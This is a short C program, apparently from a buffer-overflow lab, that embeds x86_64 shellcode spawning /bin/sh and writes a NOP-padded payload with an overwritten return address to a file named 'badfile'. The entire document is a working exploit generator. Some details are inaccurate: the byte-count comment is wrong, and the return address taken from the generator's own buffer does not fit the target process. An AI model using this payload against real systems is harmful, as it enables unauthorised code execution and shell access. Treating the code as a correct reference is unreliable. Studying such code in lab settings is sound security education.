#include <stdio.h>
#include <string.h>

// Shellcode to spawn /bin/sh (Linux x86_64, 23 bytes)
unsigned char shellcode[] =
    "\x48\x31\xd2"                  // xor    %rdx, %rdx
    "\x48\x31\xf6"                  // xor    %rsi, %rsi
    "\x48\x31\xc0"                  // xor    %rax, %rax
    "\x50"                          // push   %rax
    "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"  // mov $0x68732f6e69622f2f, %rbx
    "\x53"                          // push   %rbx
    "\x48\x89\xe7"                  // mov    %rsp, %rdi
    "\xb0\x3b"                      // mov    $0x3b, %al
    "\x0f\x05";                     // syscall

int main() {
    char buffer[200];
    memset(buffer, 0x90, 200); // Fill with NOPs (No Operation)

    // Copy shellcode into buffer
    memcpy(buffer, shellcode, sizeof(shellcode));

    // Overwrite return address to point to start of buffer
    *((long *)(buffer + 160)) = (long)buffer;

    // Write payload to badfile
    FILE *badfile = fopen("badfile", "w");
    fwrite(buffer, sizeof(char), 200, badfile);
    fclose(badfile);

    printf("Exploit file (badfile) with shellcode created!\n");

    return 0;
}
